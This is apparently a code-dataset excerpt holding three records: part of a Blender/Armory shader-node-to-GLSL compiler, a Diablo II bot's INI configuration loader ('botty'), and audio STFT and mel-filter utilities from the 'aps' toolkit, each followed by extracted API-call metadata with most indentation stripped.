out_val = '({0} - {1})'.format(val1, val2)
elif op == 'MULTIPLY':
out_val = '({0} * {1})'.format(val1, val2)
elif op == 'DIVIDE':
out_val = '({0} / {1})'.format(val1, val2)
elif op == 'POWER':
out_val = 'pow({0}, {1})'.format(val1, val2)
elif op == 'LOGARITHM':
out_val = 'log({0})'.format(val1)
elif op == 'SQRT':
out_val = 'sqrt({0})'.format(val1)
elif op == 'ABSOLUTE':
out_val = 'abs({0})'.format(val1)
elif op == 'MINIMUM':
out_val = 'min({0}, {1})'.format(val1, val2)
elif op == 'MAXIMUM':
out_val = 'max({0}, {1})'.format(val1, val2)
elif op == 'LESS_THAN':
out_val = 'float({0} < {1})'.format(val1, val2)
elif op == 'GREATER_THAN':
out_val = 'float({0} > {1})'.format(val1, val2)
elif op == 'ROUND':
# out_val = 'round({0})'.format(val1)
out_val = 'floor({0} + 0.5)'.format(val1)
elif op == 'FLOOR':
out_val = 'floor({0})'.format(val1)
elif op == 'CEIL':
out_val = 'ceil({0})'.format(val1)
elif op == 'FRACT':
out_val = 'fract({0})'.format(val1)
elif op == 'MODULO':
# out_val = 'float({0} % {1})'.format(val1, val2)
out_val = 'mod({0}, {1})'.format(val1, val2)
elif op == 'SINE':
out_val = 'sin({0})'.format(val1)
elif op == 'COSINE':
out_val = 'cos({0})'.format(val1)
elif op == 'TANGENT':
out_val = 'tan({0})'.format(val1)
elif op == 'ARCSINE':
out_val = 'asin({0})'.format(val1)
elif op == 'ARCCOSINE':
out_val = 'acos({0})'.format(val1)
elif op == 'ARCTANGENT':
out_val = 'atan({0})'.format(val1)
elif op == 'ARCTAN2':
out_val = 'atan({0}, {1})'.format(val1, val2)
if node.use_clamp:
return 'clamp({0}, 0.0, 1.0)'.format(out_val)
else:
return out_val
elif node.type == 'RGBTOBW':
col = parse_vector_input(node.inputs[0])
return '((({0}.r * 0.3 + {0}.g * 0.59 + {0}.b * 0.11) / 3.0) * 2.5)'.format(col)
elif node.type == 'SEPHSV':
return '0.0'
elif node.type == 'SEPRGB':
col = parse_vector_input(node.inputs[0])
if socket == node.outputs[0]:
return '{0}.r'.format(col)
elif socket == node.outputs[1]:
return '{0}.g'.format(col)
elif socket == node.outputs[2]:
return '{0}.b'.format(col)
elif node.type == 'SEPXYZ':
vec = parse_vector_input(node.inputs[0])
if socket == node.outputs[0]:
return '{0}.x'.format(vec)
elif socket == node.outputs[1]:
return '{0}.y'.format(vec)
elif socket == node.outputs[2]:
return '{0}.z'.format(vec)
elif node.type == 'VECT_MATH':
vec1 = parse_vector_input(node.inputs[0])
vec2 = parse_vector_input(node.inputs[1])
op = node.operation
if op == 'DOT_PRODUCT':
return 'dot({0}, {1})'.format(vec1, vec2)
else:
return '0.0'
##
def vector_curve(name, fac, points):
# Write Ys array
ys_var = name + '_ys'
curshader.write('float {0}[{1}];'.format(ys_var, len(points))) # TODO: Make const
for i in range(0, len(points)):
curshader.write('{0}[{1}] = {2};'.format(ys_var, i, points[i].location[1]))
# Get index
fac_var = name + '_fac'
curshader.write('float {0} = {1};'.format(fac_var, fac))
index = '0'
for i in range(1, len(points)):
index += ' + ({0} > {1} ? 1 : 0)'.format(fac_var, points[i].location[0])
# Write index
index_var = name + '_i'
curshader.write('int {0} = {1};'.format(index_var, index))
# Linear
# Write Xs array
facs_var = name + '_xs'
curshader.write('float {0}[{1}];'.format(facs_var, len(points))) # TODO: Make const
for i in range(0, len(points)):
curshader.write('{0}[{1}] = {2};'.format(facs_var, i, points[i].location[0]))
# Map vector
return 'mix({0}[{1}], {0}[{1} + 1], ({2} - {3}[{1}]) * (1.0 / ({3}[{1} + 1] - {3}[{1}]) ))'.format(ys_var, index_var, fac_var, facs_var)
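# For reference, the GLSL expression returned above is a piecewise-linear
# curve lookup: the index counts how many control points lie below fac, and
# the result is mix(ys[i], ys[i+1], (fac - xs[i]) / (xs[i+1] - xs[i])), i.e.
# plain linear interpolation between the two neighbouring points.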
def write_normal(inp):
if inp.is_linked and inp.links[0].from_node.type != 'GROUP_INPUT':
normal_res = parse_vector_input(inp)
if normal_res != None:
curshader.write('n = {0};'.format(normal_res))
def is_parsed(s):
global parsed
return s in parsed
def res_var_name(node, socket):
return node_name(node.name) + '_' + safesrc(socket.name) + '_res'
def write_result(l):
global parsed
res_var = res_var_name(l.from_node, l.from_socket)
# Unparsed node
if not is_parsed(res_var):
parsed[res_var] = True
st = l.from_socket.type
if st == 'RGB' or st == 'RGBA' or st == 'VECTOR':
res = parse_vector(l.from_node, l.from_socket)
if res == None:
return None
curshader.write('vec3 {0} = {1};'.format(res_var, res))
elif st == 'VALUE':
res = parse_value(l.from_node, l.from_socket)
if res == None:
return None
curshader.write('float {0} = {1};'.format(res_var, res))
# Normal map already parsed, return
elif l.from_node.type == 'NORMAL_MAP':
return None
return res_var
def glsl_type(t):
if t == 'RGB' or t == 'RGBA' or t == 'VECTOR':
return 'vec3'
else:
return 'float'
def to_uniform(inp):
uname = safesrc(inp.node.name) + safesrc(inp.name)
curshader.add_uniform(glsl_type(inp.type) + ' ' + uname)
return uname
def store_var_name(node):
return node_name(node.name) + '_store'
def texture_store(node, tex, tex_name, to_linear=False, tex_link=None):
global sample_bump
global sample_bump_res
global parsed
tex_store = store_var_name(node)
if is_parsed(tex_store):
return tex_store
parsed[tex_store] = True
mat_bind_texture(tex)
con.add_elem('tex', 'short2norm')
curshader.add_uniform('sampler2D {0}'.format(tex_name), link=tex_link)
if node.inputs[0].is_linked:
uv_name = parse_vector_input(node.inputs[0])
uv_name = 'vec2({0}.x, 1.0 - {0}.y)'.format(uv_name)
else:
uv_name = 'texCoord'
triplanar = node.projection == 'BOX'
if triplanar:
curshader.write(f'vec3 texCoordBlend = vec3(0.0); vec2 {uv_name}1 = vec2(0.0); vec2 {uv_name}2 = vec2(0.0);') # Temp
curshader.write(f'vec4 {tex_store} = vec4(0.0, 0.0, 0.0, 0.0);')
curshader.write(f'if (texCoordBlend.x > 0) {tex_store} += texture({tex_name}, {uv_name}.xy) * texCoordBlend.x;')
curshader.write(f'if (texCoordBlend.y > 0) {tex_store} += texture({tex_name}, {uv_name}1.xy) * texCoordBlend.y;')
curshader.write(f'if (texCoordBlend.z > 0) {tex_store} += texture({tex_name}, {uv_name}2.xy) * texCoordBlend.z;')
else:
if mat_texture_grad():
curshader.write('vec4 {0} = textureGrad({1}, {2}.xy, g2.xy, g2.zw);'.format(tex_store, tex_name, uv_name))
else:
curshader.write('vec4 {0} = texture({1}, {2}.xy);'.format(tex_store, tex_name, uv_name))
if sample_bump:
sample_bump_res = tex_store
curshader.write('float {0}_1 = textureOffset({1}, {2}.xy, ivec2(-2, 0)).r;'.format(tex_store, tex_name, uv_name))
curshader.write('float {0}_2 = textureOffset({1}, {2}.xy, ivec2(2, 0)).r;'.format(tex_store, tex_name, uv_name))
curshader.write('float {0}_3 = textureOffset({1}, {2}.xy, ivec2(0, -2)).r;'.format(tex_store, tex_name, uv_name))
curshader.write('float {0}_4 = textureOffset({1}, {2}.xy, ivec2(0, 2)).r;'.format(tex_store, tex_name, uv_name))
sample_bump = False
if to_linear:
curshader.write('{0}.rgb = pow({0}.rgb, vec3(2.2));'.format(tex_store))
return tex_store
def write_bump(node, res, scl=0.001):
global sample_bump
global sample_bump_res
sample_bump_res = store_var_name(node) + '_bump'
    # Split the generated call into prefix, coordinate argument and suffix so
    # the coordinate can be offset for the four bump samples written below
ar = res.split('(', 1)
pre = ar[0] + '('
if ',' in ar[1]:
ar2 = ar[1].split(',', 1)
co = ar2[0]
post = ',' + ar2[1]
else:
co = ar[1][:-1]
post = ')'
curshader.write('float {0}_1 = {1}{2} + vec3(-{4}, 0.0, 0.0){3};'.format(sample_bump_res, pre, co, post, scl))
curshader.write('float {0}_2 = {1}{2} + vec3({4}, 0.0, {4}){3};'.format(sample_bump_res, pre, co, post, scl))
curshader.write('float {0}_3 = {1}{2} + vec3(0.0, -{4}, 0.0){3};'.format(sample_bump_res, pre, co, post, scl))
curshader.write('float {0}_4 = {1}{2} + vec3(0.0, {4}, -{4}){3};'.format(sample_bump_res, pre, co, post, scl))
sample_bump = False
def to_vec1(v):
return str(v)
def to_vec3(v):
return 'vec3({0}, {1}, {2})'.format(v[0], v[1], v[2])
def node_by_type(nodes, ntype):
for n in nodes:
if n.type == ntype:
return n
def socket_index(node, socket):
for i in range(0, len(node.outputs)):
if node.outputs[i] == socket:
return i
def node_name(s):
for p in parents:
s = p.name + '_' + s
if curshader.write_textures > 0:
s += '_texread'
s = safesrc(s)
if '__' in s: # Consecutive _ are reserved
s = s.replace('_', '_x')
return s
##
def make_texture(image_node, tex_name, matname=None):
tex = {}
tex['name'] = tex_name
image = image_node.image
if matname is None:
matname = mat_state.material.name
if image is None:
return None
# Get filepath
filepath = image.filepath
if filepath == '':
if image.packed_file is not None:
filepath = './' + image.name
has_ext = filepath.endswith(('.jpg', '.png', '.hdr'))
if not has_ext:
# Raw bytes, write converted .jpg to /unpacked
filepath += '.raw'
elif image.source == "GENERATED":
unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked')
if not os.path.exists(unpack_path):
os.makedirs(unpack_path)
filepath = os.path.join(unpack_path, image.name + ".jpg")
arm.utils.convert_image(image, filepath, "JPEG")
else:
arm.log.warn(matname + '/' + image.name + ' - invalid file path')
return None
# Reference image name
texpath = arm.utils.asset_path(filepath)
texfile = arm.utils.extract_filename(filepath)
tex['file'] = arm.utils.safestr(texfile)
s = tex['file'].rsplit('.', 1)
if len(s) == 1:
arm.log.warn(matname + '/' + image.name + ' - file extension required for image name')
return None
ext = s[1].lower()
do_convert = ext not in ('jpg', 'png', 'hdr', 'mp4') # Convert image
if do_convert:
new_ext = 'png' if (ext in ('tga', 'dds')) else 'jpg'
tex['file'] = tex['file'].rsplit('.', 1)[0] + '.' + new_ext
if image.packed_file is not None or not is_ascii(texfile):
# Extract packed data / copy non-ascii texture
unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked')
if not os.path.exists(unpack_path):
os.makedirs(unpack_path)
unpack_filepath = os.path.join(unpack_path, tex['file'])
if do_convert:
if not os.path.isfile(unpack_filepath):
fmt = 'PNG' if new_ext == 'png' else 'JPEG'
arm.utils.convert_image(image, unpack_filepath, file_format=fmt)
else:
# Write bytes if size is different or file does not exist yet
if image.packed_file is not None:
if not os.path.isfile(unpack_filepath) or os.path.getsize(unpack_filepath) != image.packed_file.size:
with open(unpack_filepath, 'wb') as f:
f.write(image.packed_file.data)
# Copy non-ascii texture
else:
if not os.path.isfile(unpack_filepath) or os.path.getsize(unpack_filepath) != os.path.getsize(texpath):
shutil.copy(texpath, unpack_filepath)
arm.assets.add(unpack_filepath)
else:
if not os.path.isfile(arm.utils.asset_path(filepath)):
arm.log.warn('Material ' + matname + '/' + image.name + ' - file not found(' + filepath + ')')
return None
if do_convert:
unpack_path = os.path.join(arm.utils.get_fp_build(), 'compiled', 'Assets', 'unpacked')
if not os.path.exists(unpack_path):
os.makedirs(unpack_path)
converted_path = os.path.join(unpack_path, tex['file'])
# TODO: delete cache when file changes
if not os.path.isfile(converted_path):
fmt = 'PNG' if new_ext == 'png' else 'JPEG'
arm.utils.convert_image(image, converted_path, file_format=fmt)
arm.assets.add(converted_path)
else:
# Link image path to assets
# TODO: Khamake converts .PNG to .jpg? Convert ext to lowercase on windows
if arm.utils.get_os() == 'win':
s = filepath.rsplit('.', 1)
arm.assets.add(arm.utils.asset_path(s[0] + '.' + s[1].lower()))
else:
arm.assets.add(arm.utils.asset_path(filepath))
# if image_format != 'RGBA32':
# tex['format'] = image_format
interpolation = image_node.interpolation
rpdat = arm.utils.get_rp()
texfilter = rpdat.arm_texture_filter
if texfilter == 'Anisotropic':
interpolation = 'Smart'
elif texfilter == 'Linear':
interpolation = 'Linear'
elif texfilter == 'Point':
interpolation = 'Closest'
# TODO: Blender seems to load full images on size request, cache size instead
powimage = is_pow(image.size[0]) and is_pow(image.size[1])
if interpolation == 'Cubic': # Mipmap linear
tex['mipmap_filter'] = 'linear'
tex['generate_mipmaps'] = True
elif interpolation == 'Smart': # Mipmap anisotropic
tex['min_filter'] = 'anisotropic'
tex['mipmap_filter'] = 'linear'
tex['generate_mipmaps'] = True
elif interpolation == 'Closest':
tex['min_filter'] = 'point'
tex['mag_filter'] = 'point'
# else defaults to linear
if image_node.extension != 'REPEAT': # Extend or clip
tex['u_addressing'] = 'clamp'
tex['v_addressing'] = 'clamp'
if image.source == 'MOVIE':
tex['source'] = 'movie'
tex['min_filter'] = 'linear'
tex['mag_filter'] = 'linear'
tex['mipmap_filter'] = 'no'
tex['generate_mipmaps'] = False
return tex
def is_pow(num):
return ((num & (num - 1)) == 0) and num != 0
def is_ascii(s):
return len(s) == len(s.encode())
##
def get_rp_renderer():
return arm.utils.get_rp().rp_renderer
def get_arm_export_tangents():
return bpy.data.worlds['Arm'].arm_export_tangents
def safesrc(name):
return arm.utils.safesrc(name)
def get_sdk_path():
return arm.utils.get_sdk_path()
def disp_enabled():
return arm.utils.disp_enabled(arm.make_state.target)
def warn(text):
arm.log.warn(text)
def assets_add(path):
arm.assets.add(path)
def assets_add_embedded_data(path):
arm.assets.add_embedded_data(path)
def mat_name():
return mat_state.material.name
def mat_batch():
return mat_state.batch
def mat_bind_texture(tex):
mat_state.bind_textures.append(tex)
def mat_texture_grad():
return mat_state.texture_grad
def mat_get_material():
return mat_state.material
def mat_get_material_users():
return mat_state.mat_users
| [((1753, 4, 1753, 39), 'arm.material.mat_state.bind_textures.append', 'mat_state.bind_textures.append', ({(1753, 35, 1753, 38): 'tex'}, {}), '(tex)', True, 'import arm.material.mat_state as mat_state\n'), ((1628, 26, 1628, 64), 'os.path.join', 'os.path.join', ({(1628, 39, 1628, 50): 'unpack_path', (1628, 52, 1628, 63): "tex['file']"}, {}), "(unpack_path, tex['file'])", False, 'import os\n'), ((1626, 15, 1626, 42), 'os.path.exists', 'os.path.exists', ({(1626, 30, 1626, 41): 'unpack_path'}, {}), '(unpack_path)', False, 'import os\n'), ((1627, 12, 1627, 36), 'os.makedirs', 'os.makedirs', ({(1627, 24, 1627, 35): 'unpack_path'}, {}), '(unpack_path)', False, 'import os\n'), ((1657, 29, 1657, 67), 'os.path.join', 'os.path.join', ({(1657, 42, 1657, 53): 'unpack_path', (1657, 55, 1657, 66): "tex['file']"}, {}), "(unpack_path, tex['file'])", False, 'import os\n'), ((1600, 23, 1600, 69), 'os.path.join', 'os.path.join', ({(1600, 36, 1600, 47): 'unpack_path', (1600, 49, 1600, 68): "image.name + '.jpg'"}, {}), "(unpack_path, image.name + '.jpg')", False, 'import os\n'), ((1631, 19, 1631, 50), 'os.path.isfile', 'os.path.isfile', ({(1631, 34, 1631, 49): 'unpack_filepath'}, {}), '(unpack_filepath)', False, 'import os\n'), ((1655, 19, 1655, 46), 'os.path.exists', 'os.path.exists', ({(1655, 34, 1655, 45): 'unpack_path'}, {}), '(unpack_path)', False, 'import os\n'), ((1656, 16, 1656, 40), 'os.makedirs', 'os.makedirs', ({(1656, 28, 1656, 39): 'unpack_path'}, {}), '(unpack_path)', False, 'import os\n'), ((1659, 19, 1659, 49), 'os.path.isfile', 'os.path.isfile', ({(1659, 34, 1659, 48): 'converted_path'}, {}), '(converted_path)', False, 'import os\n'), ((1597, 19, 1597, 46), 'os.path.exists', 'os.path.exists', ({(1597, 34, 1597, 45): 'unpack_path'}, {}), '(unpack_path)', False, 'import os\n'), ((1598, 16, 1598, 40), 'os.makedirs', 'os.makedirs', ({(1598, 28, 1598, 39): 'unpack_path'}, {}), '(unpack_path)', False, 'import os\n'), ((1644, 20, 1644, 57), 'shutil.copy', 'shutil.copy', ({(1644, 32, 1644, 39): 'texpath', (1644, 41, 1644, 56): 'unpack_filepath'}, {}), '(texpath, unpack_filepath)', False, 'import shutil\n'), ((1638, 23, 1638, 54), 'os.path.isfile', 'os.path.isfile', ({(1638, 38, 1638, 53): 'unpack_filepath'}, {}), '(unpack_filepath)', False, 'import os\n'), ((1638, 58, 1638, 90), 'os.path.getsize', 'os.path.getsize', ({(1638, 74, 1638, 89): 'unpack_filepath'}, {}), '(unpack_filepath)', False, 'import os\n'), ((1643, 23, 1643, 54), 'os.path.isfile', 'os.path.isfile', ({(1643, 38, 1643, 53): 'unpack_filepath'}, {}), '(unpack_filepath)', False, 'import os\n'), ((1643, 58, 1643, 90), 'os.path.getsize', 'os.path.getsize', ({(1643, 74, 1643, 89): 'unpack_filepath'}, {}), '(unpack_filepath)', False, 'import os\n'), ((1643, 94, 1643, 118), 'os.path.getsize', 'os.path.getsize', ({(1643, 110, 1643, 117): 'texpath'}, {}), '(texpath)', False, 'import os\n'), ((912, 100, 912, 111), 'math.cos', 'math.cos', ({(912, 109, 912, 110): 'a'}, {}), '(a)', False, 'import math\n'), ((912, 113, 912, 124), 'math.sin', 'math.sin', ({(912, 122, 912, 123): 'a'}, {}), '(a)', False, 'import math\n')] |
Jizanator/botty | src/config.py | 3026de0d4c03f4e797ed92dedb8fdfdf9cf1462e | import configparser
import numpy as np
import os
class Config:
def _select_val(self, section: str, key: str = None):
if section in self._custom and key in self._custom[section]:
return self._custom[section][key]
elif section in self._config:
return self._config[section][key]
elif section in self._pickit_config:
return self._pickit_config[section][key]
elif section in self._shop_config:
return self._shop_config[section][key]
else:
return self._game_config[section][key]
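    # Lookup precedence (highest wins): custom.ini -> params.ini -> pickit.ini
    # -> shop.ini -> game.ini.  Hypothetical example (key names assumed):
    #   self._select_val("char", "type")  # custom override if present,
    #                                     # otherwise the params.ini value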
def __init__(self, print_warnings: bool = False):
        # print_warnings is a workaround: Config is instantiated in several
        # places instead of passing a single shared instance around, so
        # warnings are only printed when explicitly requested
self._print_warnings = print_warnings
self._config = configparser.ConfigParser()
self._config.read('config/params.ini')
self._game_config = configparser.ConfigParser()
self._game_config.read('config/game.ini')
self._pickit_config = configparser.ConfigParser()
self._pickit_config.read('config/pickit.ini')
self._shop_config = configparser.ConfigParser()
self._shop_config.read('config/shop.ini')
self._custom = configparser.ConfigParser()
if os.environ.get('RUN_ENV') != "test" and os.path.exists('config/custom.ini'):
self._custom.read('config/custom.ini')
self.general = {
"saved_games_folder": self._select_val("general", "saved_games_folder"),
"name": self._select_val("general", "name"),
"monitor": int(self._select_val("general", "monitor")),
"max_game_length_s": float(self._select_val("general", "max_game_length_s")),
"exit_key": self._select_val("general", "exit_key"),
"resume_key": self._select_val("general", "resume_key"),
"auto_settings_key": self._select_val("general", "auto_settings_key"),
"graphic_debugger_key": self._select_val("general", "graphic_debugger_key"),
"logg_lvl": self._select_val("general", "logg_lvl"),
"randomize_runs": bool(int(self._select_val("general", "randomize_runs"))),
"difficulty": self._select_val("general", "difficulty"),
"custom_message_hook": self._select_val("general", "custom_message_hook"),
"discord_status_count": False if not self._select_val("general", "discord_status_count") else int(self._select_val("general", "discord_status_count")),
"info_screenshots": bool(int(self._select_val("general", "info_screenshots"))),
"loot_screenshots": bool(int(self._select_val("general", "loot_screenshots"))),
}
# Added for dclone ip hunting
self.dclone = {
"region_ips": self._select_val("dclone", "region_ips"),
"dclone_hotip": self._select_val("dclone", "dclone_hotip"),
}
self.routes = {}
for key in self._config["routes"]:
self.routes[key] = bool(int(self._select_val("routes", key)))
self.char = {
"type": self._select_val("char", "type"),
"show_items": self._select_val("char", "show_items"),
"inventory_screen": self._select_val("char", "inventory_screen"),
"stand_still": self._select_val("char", "stand_still"),
"force_move": self._select_val("char", "force_move"),
"num_loot_columns": int(self._select_val("char", "num_loot_columns")),
"take_health_potion": float(self._select_val("char", "take_health_potion")),
"take_mana_potion": float(self._select_val("char", "take_mana_potion")),
"take_rejuv_potion_health": float(self._select_val("char", "take_rejuv_potion_health")),
"take_rejuv_potion_mana": float(self._select_val("char", "take_rejuv_potion_mana")),
"heal_merc": float(self._select_val("char", "heal_merc")),
"heal_rejuv_merc": float(self._select_val("char", "heal_rejuv_merc")),
"chicken": float(self._select_val("char", "chicken")),
"merc_chicken": float(self._select_val("char", "merc_chicken")),
"tp": self._select_val("char", "tp"),
"belt_rows": int(self._select_val("char", "belt_rows")),
"show_belt": self._select_val("char", "show_belt"),
"potion1": self._select_val("char", "potion1"),
"potion2": self._select_val("char", "potion2"),
"potion3": self._select_val("char", "potion3"),
"potion4": self._select_val("char", "potion4"),
"belt_rejuv_columns": int(self._select_val("char", "belt_rejuv_columns")),
"belt_hp_columns": int(self._select_val("char", "belt_hp_columns")),
"belt_mp_columns": int(self._select_val("char", "belt_mp_columns")),
"stash_gold": bool(int(self._select_val("char", "stash_gold"))),
"gold_trav_only": bool(int(self._select_val("char", "gold_trav_only"))),
"use_merc": bool(int(self._select_val("char", "use_merc"))),
"pre_buff_every_run": bool(int(self._select_val("char", "pre_buff_every_run"))),
"cta_available": bool(int(self._select_val("char", "cta_available"))),
"weapon_switch": self._select_val("char", "weapon_switch"),
"battle_orders": self._select_val("char", "battle_orders"),
"battle_command": self._select_val("char", "battle_command"),
"casting_frames": int(self._select_val("char", "casting_frames")),
"atk_len_trav": float(self._select_val("char", "atk_len_trav")),
"atk_len_pindle": float(self._select_val("char", "atk_len_pindle")),
"atk_len_eldritch": float(self._select_val("char", "atk_len_eldritch")),
"atk_len_shenk": float(self._select_val("char", "atk_len_shenk")),
"atk_len_nihlatak": float(self._select_val("char", "atk_len_nihlatak")),
"hork_time_pindle": float(self._select_val("char", "hork_time_pindle")),
"hork_time_eldritch": float(self._select_val("char", "hork_time_eldritch")),
"hork_time_shenk": float(self._select_val("char", "hork_time_shenk")),
"hork_time_council": float(self._select_val("char", "hork_time_council")),
"hork_time_nihlatak": float(self._select_val("char", "hork_time_nihlatak")),
}
self.sorceress = dict(self._config["sorceress"])
if "sorceress" in self._custom:
self.sorceress.update(dict(self._custom["sorceress"]))
self.hammerdin = self._config["hammerdin"]
if "hammerdin" in self._custom:
self.hammerdin.update(self._custom["hammerdin"])
self.trapsin = self._config["trapsin"]
if "trapsin" in self._custom:
self.trapsin.update(self._custom["trapsin"])
self.barbarian = self._config["barbarian"]
if "barbarian" in self._custom:
self.barbarian.update(self._custom["barbarian"])
self.advanced_options = {
"pathing_delay_factor": min(max(int(self._select_val("advanced_options", "pathing_delay_factor")), 1), 10),
"message_headers": self._select_val("advanced_options", "message_headers"),
"message_body_template": self._select_val("advanced_options", "message_body_template"),
"message_highlight": bool(int(self._select_val("advanced_options", "message_highlight"))),
}
self.items = {}
for key in self._pickit_config["items"]:
self.items[key] = int(self._select_val("items", key))
if self.items[key] and not os.path.exists(f"./assets/items/{key}.png") and self._print_warnings:
print(f"Warning: You activated {key} in pickit, but there is no img available in assets/items")
self.colors = {}
for key in self._game_config["colors"]:
self.colors[key] = np.split(np.array([int(x) for x in self._select_val("colors", key).split(",")]), 2)
self.ui_pos = {}
for key in self._game_config["ui_pos"]:
self.ui_pos[key] = int(self._select_val("ui_pos", key))
self.ui_roi = {}
for key in self._game_config["ui_roi"]:
self.ui_roi[key] = np.array([int(x) for x in self._select_val("ui_roi", key).split(",")])
self.path = {}
for key in self._game_config["path"]:
self.path[key] = np.reshape(np.array([int(x) for x in self._select_val("path", key).split(",")]), (-1, 2))
self.shop = {
"shop_trap_claws": bool(int(self._select_val("claws", "shop_trap_claws"))),
"shop_melee_claws": bool(int(self._select_val("claws", "shop_melee_claws"))),
"shop_3_skills_ias_gloves": bool(int(self._select_val("gloves", "shop_3_skills_ias_gloves"))),
"shop_2_skills_ias_gloves": bool(int(self._select_val("gloves", "shop_2_skills_ias_gloves"))),
"trap_min_score": int(self._select_val("claws", "trap_min_score")),
"melee_min_score": int(self._select_val("claws", "melee_min_score")),
}
if __name__ == "__main__":
config = Config(print_warnings=True)
# Check if any added items miss templates
for k in config.items:
if not os.path.exists(f"./assets/items/{k}.png"):
print(f"Template not found: {k}")
# Check if any item templates miss a config
for filename in os.listdir(f'assets/items'):
filename = filename.lower()
if filename.endswith('.png'):
item_name = filename[:-4]
blacklist_item = item_name.startswith("bl__")
if item_name not in config.items and not blacklist_item:
print(f"Config not found for: " + filename)
| [((173, 20, 173, 47), 'os.listdir', 'os.listdir', ({(173, 31, 173, 46): 'f"""assets/items"""'}, {}), "(f'assets/items')", False, 'import os\n'), ((23, 23, 23, 50), 'configparser.ConfigParser', 'configparser.ConfigParser', ({}, {}), '()', False, 'import configparser\n'), ((25, 28, 25, 55), 'configparser.ConfigParser', 'configparser.ConfigParser', ({}, {}), '()', False, 'import configparser\n'), ((27, 30, 27, 57), 'configparser.ConfigParser', 'configparser.ConfigParser', ({}, {}), '()', False, 'import configparser\n'), ((29, 28, 29, 55), 'configparser.ConfigParser', 'configparser.ConfigParser', ({}, {}), '()', False, 'import configparser\n'), ((31, 23, 31, 50), 'configparser.ConfigParser', 'configparser.ConfigParser', ({}, {}), '()', False, 'import configparser\n'), ((32, 51, 32, 86), 'os.path.exists', 'os.path.exists', ({(32, 66, 32, 85): '"""config/custom.ini"""'}, {}), "('config/custom.ini')", False, 'import os\n'), ((169, 15, 169, 56), 'os.path.exists', 'os.path.exists', ({(169, 30, 169, 55): 'f"""./assets/items/{k}.png"""'}, {}), "(f'./assets/items/{k}.png')", False, 'import os\n'), ((32, 11, 32, 36), 'os.environ.get', 'os.environ.get', ({(32, 26, 32, 35): '"""RUN_ENV"""'}, {}), "('RUN_ENV')", False, 'import os\n'), ((135, 39, 135, 82), 'os.path.exists', 'os.path.exists', ({(135, 54, 135, 81): 'f"""./assets/items/{key}.png"""'}, {}), "(f'./assets/items/{key}.png')", False, 'import os\n')] |
haoxiangsnr/aps | aps/transform/utils.py | 38f77139b54553b0cb04b26a833bebbbf3177c5e | # Copyright 2019 Jian Wu
# License: Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
import math
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as tf
import librosa.filters as filters
from aps.const import EPSILON
from typing import Optional, Union, Tuple
def init_window(wnd: str, frame_len: int) -> th.Tensor:
"""
Return window coefficient
Args:
wnd: window name
frame_len: length of the frame
"""
def sqrthann(frame_len, periodic=True):
return th.hann_window(frame_len, periodic=periodic)**0.5
if wnd not in ["bartlett", "hann", "hamm", "blackman", "rect", "sqrthann"]:
raise RuntimeError(f"Unknown window type: {wnd}")
wnd_tpl = {
"sqrthann": sqrthann,
"hann": th.hann_window,
"hamm": th.hamming_window,
"blackman": th.blackman_window,
"bartlett": th.bartlett_window,
"rect": th.ones
}
if wnd != "rect":
# match with librosa
c = wnd_tpl[wnd](frame_len, periodic=True)
else:
c = wnd_tpl[wnd](frame_len)
return c
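# Usage sketch (assumed frame size): a 400-sample square-root Hann window
#   win = init_window("sqrthann", 400)   # -> th.Tensor of shape (400,)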
def init_kernel(frame_len: int,
frame_hop: int,
window: str,
round_pow_of_two: bool = True,
normalized: bool = False,
inverse: bool = False,
mode: str = "librosa") -> th.Tensor:
"""
Return STFT kernels
Args:
frame_len: length of the frame
frame_hop: hop size between frames
window: window name
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
normalized: return normalized DFT matrix
inverse: return iDFT matrix
mode: framing mode (librosa or kaldi)
"""
if mode not in ["librosa", "kaldi"]:
raise ValueError(f"Unsupported mode: {mode}")
# FFT points
B = 2**math.ceil(math.log2(frame_len)) if round_pow_of_two else frame_len
# center padding window if needed
if mode == "librosa" and B != frame_len:
lpad = (B - frame_len) // 2
window = tf.pad(window, (lpad, B - frame_len - lpad))
if normalized:
# make K^H * K = I
S = B**0.5
else:
S = 1
I = th.stack([th.eye(B), th.zeros(B, B)], dim=-1)
# W x B x 2
K = th.fft(I / S, 1)
if mode == "kaldi":
K = K[:frame_len]
if inverse and not normalized:
# to make K^H * K = I
K = K / B
# 2 x B x W
K = th.transpose(K, 0, 2) * window
# 2B x 1 x W
K = th.reshape(K, (B * 2, 1, K.shape[-1]))
return K, window
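# Usage sketch (assumed 25 ms frames with a 10 ms hop at 16 kHz):
#   K, w = init_kernel(400, 160, init_window("hann", 400))
#   # librosa mode pads the window to the FFT size B = 512, so K has
#   # shape (2 * B, 1, B) and w has shape (B,)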
def mel_filter(frame_len: int,
round_pow_of_two: bool = True,
num_bins: Optional[int] = None,
sr: int = 16000,
num_mels: int = 80,
fmin: float = 0.0,
fmax: Optional[float] = None,
norm: bool = False) -> th.Tensor:
"""
Return mel filter coefficients
Args:
frame_len: length of the frame
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
num_bins: number of the frequency bins produced by STFT
num_mels: number of the mel bands
fmin: lowest frequency (in Hz)
fmax: highest frequency (in Hz)
norm: normalize the mel filter coefficients
"""
# FFT points
if num_bins is None:
N = 2**math.ceil(
math.log2(frame_len)) if round_pow_of_two else frame_len
else:
N = (num_bins - 1) * 2
# fmin & fmax
freq_upper = sr // 2
if fmax is None:
fmax = freq_upper
else:
fmax = min(fmax + freq_upper if fmax < 0 else fmax, freq_upper)
fmin = max(0, fmin)
# mel filter coefficients
mel = filters.mel(sr,
N,
n_mels=num_mels,
fmax=fmax,
fmin=fmin,
htk=True,
norm="slaney" if norm else None)
# num_mels x (N // 2 + 1)
return th.tensor(mel, dtype=th.float32)
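# Usage sketch (assumed values): an 80-band filterbank for 16 kHz audio with
# 400-sample frames rounded up to a 512-point FFT:
#   mel = mel_filter(400, num_mels=80, sr=16000)   # -> shape (80, 257)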
def speed_perturb_filter(src_sr: int,
dst_sr: int,
cutoff_ratio: float = 0.95,
num_zeros: int = 64) -> th.Tensor:
"""
Return speed perturb filters, reference:
https://github.com/danpovey/filtering/blob/master/lilfilter/resampler.py
Args:
src_sr: sample rate of the source signal
dst_sr: sample rate of the target signal
Return:
weight (Tensor): coefficients of the filter
"""
if src_sr == dst_sr:
raise ValueError(
f"src_sr should not be equal to dst_sr: {src_sr}/{dst_sr}")
